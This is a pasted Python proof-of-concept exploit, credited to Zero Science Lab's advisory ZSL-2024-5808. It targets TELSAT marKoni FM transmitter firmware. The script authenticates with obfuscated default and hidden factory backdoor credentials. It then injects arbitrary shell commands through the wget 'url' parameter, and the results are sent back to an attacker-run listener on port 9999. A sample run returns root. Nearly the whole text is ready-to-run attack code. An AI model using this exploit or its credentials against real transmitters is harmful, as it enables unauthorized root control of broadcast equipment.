Advertisement
FlyFar

TELSAT marKoni FM Transmitter 1.9.5 Root Command Injection - PoC Exploit

Mar 21st, 2024
4,202
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 5.94 KB | Cybersecurity | 0 0
  1. #!/usr/bin/env python
  2. #
  3. #
  4. # TELSAT marKoni FM Transmitter 1.9.5 Root Command Injection PoC Exploit
  5. #
  6. #
  7. # Vendor: TELSAT Srl
  8. # Product web page: https://www.markoni.it
  9. # Affected version: Markoni-D (Compact) FM Transmitters
  10. #                   Markoni-DH (Exciter+Amplifiers) FM Transmitters
  11. #                   Markoni-A (Analogue Modulator) FM Transmitters
  12. #                   Firmware: 1.9.5
  13. #                             1.9.3
  14. #                             1.5.9
  15. #                             1.4.6
  16. #                             1.3.9
  17. #
  18. # Summary: Professional FM transmitters.
  19. #
  20. # Desc: The marKoni FM transmitters are susceptible to unauthenticated
  21. # remote code execution with root privileges. An attacker can exploit
  22. # a command injection vulnerability by manipulating the Email settings'
  23. # WAN IP info service, which utilizes the 'wget' module. This allows
  24. # the attacker to gain unauthorized access to the system with administrative
  25. # privileges by exploiting the 'url' parameter in the HTTP GET request
  26. # to ekafcgi.fcgi.
  27. #
  28. # -------------------------------------------------------------------------
  29. # [lqwrm@metalgear ~]# python yp.tiolpxe 10.0.8.3:88 backdoor 10.0.8.69 whoami
  30. # Authentication successful for backdoor
  31. # Injecting command: whoami
  32. # Listening on port 9999
  33. # ('10.0.8.3', 47302) called back
  34. # Received: root
  35. # Housekeeping...
  36. # Zya and thanks for stopping by!
  37. #
  38. # [lqwrm@metalgear ~]#
  39. #
  40. # -------------------------------------------------------------------------
  41. #
  42. # Tested on: GNU/Linux 3.10.53 (armv7l)
  43. #            icorem6solox
  44. #            lighttpd/1.4.33
  45. #
  46. #
  47. # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  48. # Macedonian Information Security Research and Development Laboratory
  49. # Zero Science Lab - https://www.zeroscience.mk - @zeroscience
  50. #
  51. #
  52. # Advisory ID: ZSL-2024-5808
  53. # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5808.php
  54. #
  55. #
  56. # 10.11.2023
  57. #
  58.  
  59. from colorama import init, Fore
  60. import re,os,sys,requests
  61. import socket,threading
  62. from time import sleep
  63. init()
  64.  
  65. def just_listen_to_me(lport, cstop):
  66.     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  67.     s.bind(("0.0.0.0", lport))
  68.     s.listen(1)
  69.     print("Listening on port " + str(lport))
  70.     try:
  71.         conn, addr = s.accept()
  72.         print(addr, "called back")
  73.         cstop.set()
  74.     except socket.timeout:
  75.         print("Call return timeout\nCheck your ports")
  76.         conn.close()
  77.     while True:
  78.         try:
  79.             odg = conn.recv(1771).decode()
  80.             uam = re.search(r"User-Agent:\s*(.*)", odg)
  81.  
  82.             if uam:
  83.                 uav = uam.group(1)
  84.                 print(f"Received: {uav}")
  85.                 exit()
  86.             else:
  87.                 print("No output for you")
  88.         except:
  89.             print("Housekeeping...")
  90.             exit()
  91.     s.close()
  92.  
  93. def authenticate(ipaddr, option): #### Encrypted Shit ####_"
  94.     auth_url = f"http://{ipaddr}" # oOoOoOoOoOoOoOoOoOoOoOo"
  95.     ep = "/cgi-bin/ekafcgi.fcgi?OpCode=" ##################"
  96.     if option == "user": ##################################"
  97.         username = "\x75\x73\x65\x72" #####################"
  98.         password = "\x75\x73\x65\x72" #####################"
  99.     elif option == "admin": ###############################"
  100.         username = "\x61\x64\x6D\x69\x6E" #################"
  101.         password = "\x61\x64\x6D\x69\x6E" #################"
  102.     elif option == "backdoor": ############################"
  103.         username = "\x66\x61\x63\x74\x6F\x72\x79" #########"
  104.         password = "\x69\x6E\x6F\x6B\x72\x61\x6D\x32\x35"#_"
  105.  
  106.     authp = {
  107.         'username': username,
  108.         'password': password
  109.     }
  110.  
  111.     resp = requests.get(auth_url + ep + "1", params=authp)
  112.  
  113.     if "Set-Cookie" in resp.headers:
  114.         print(f"Authentication successful for {option}")
  115.         auth_cookie = resp.headers["Set-Cookie"].split(";")[0]
  116.         return auth_cookie
  117.     else:
  118.         print(f"Authentication failed for {option}.")
  119.         print("Try a different option.")
  120.         return None
  121.  
  122. def execute(ipaddr, cookie, command, listen_ip):
  123.     print(f"Injecting command: {command}")
  124.     ep = "/cgi-bin/ekafcgi.fcgi?OpCode="
  125.     eden = f"http://{ipaddr}{ep}26&param=wget&ena=1&url=-U%20%60{command}%60%20{listen_ip}:9999"
  126.     dva = f"http://{ipaddr}{ep}27"
  127.     tri = f"http://{ipaddr}{ep}26&param=wget&ena=0&url="
  128.     clear = f"http://{ipaddr}{ep}3&com1=203C%20001001"
  129.  
  130.     headers = {"Cookie": cookie}
  131.  
  132.     requests.get(eden, headers=headers)
  133.     sleep(2)
  134.     requests.get(dva, headers=headers)
  135.     sleep(2)
  136.     requests.get(tri, headers=headers)
  137.     sleep(1)
  138.     requests.get(clear, headers=headers)
  139.     print("Zya and thanks for stopping by!")
  140.     exit(0)
  141.  
  142. def njaaah(text):
  143.     columns = os.get_terminal_size().columns
  144.     print(text.center(columns))
  145.  
  146. zsl = "\033[91mWaddup!\033[0m" #Win64
  147. mrjox = f"""
  148.     ________
  149.   /          \\
  150.  /    ____    \\
  151. |   /    0 \\   |
  152. |   \\______/   |
  153.  \\____________/  {zsl}
  154.       | |
  155.      /   \\
  156.     /  O  \\
  157.    |    O  \\
  158.    |       \\
  159.    |        \\
  160.    |_________|
  161.        """
  162.  
  163. if len(sys.argv) != 5:
  164.     print()
  165.     print("This is a PoC script for the marKoni transmitters 0day")
  166.     print("Usage: python yp.tiolpxe <target_ip:port> <option> <listen_ip> <command>")
  167.     print("Option: 'user', 'admin', 'backdoor'")
  168.     print("Default listening port: 9999")
  169.     njaaah(mrjox)
  170.     exit()
  171.  
  172. ipaddr = sys.argv[1]
  173. opt = sys.argv[2]
  174. listen_ip = sys.argv[3]
  175. command = sys.argv[4]
  176.  
  177. opt_map = {
  178.     "admin"    : "admin",
  179.     "user"     : "user",
  180.     "backdoor" : "backdoor"
  181. }
  182.  
  183. if opt in opt_map:
  184.     auth_cookie = authenticate(ipaddr, opt_map[opt])
  185.     if auth_cookie:
  186.         cstop = threading.Event()
  187.         lt = threading.Thread(target=just_listen_to_me, args=(9999, cstop))
  188.         lt.start()
  189.         execute(ipaddr, auth_cookie, command, listen_ip)
  190.         cstop.set()
  191.         lt.join()
  192. else:
  193.     print("Invalid option.")
  194.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement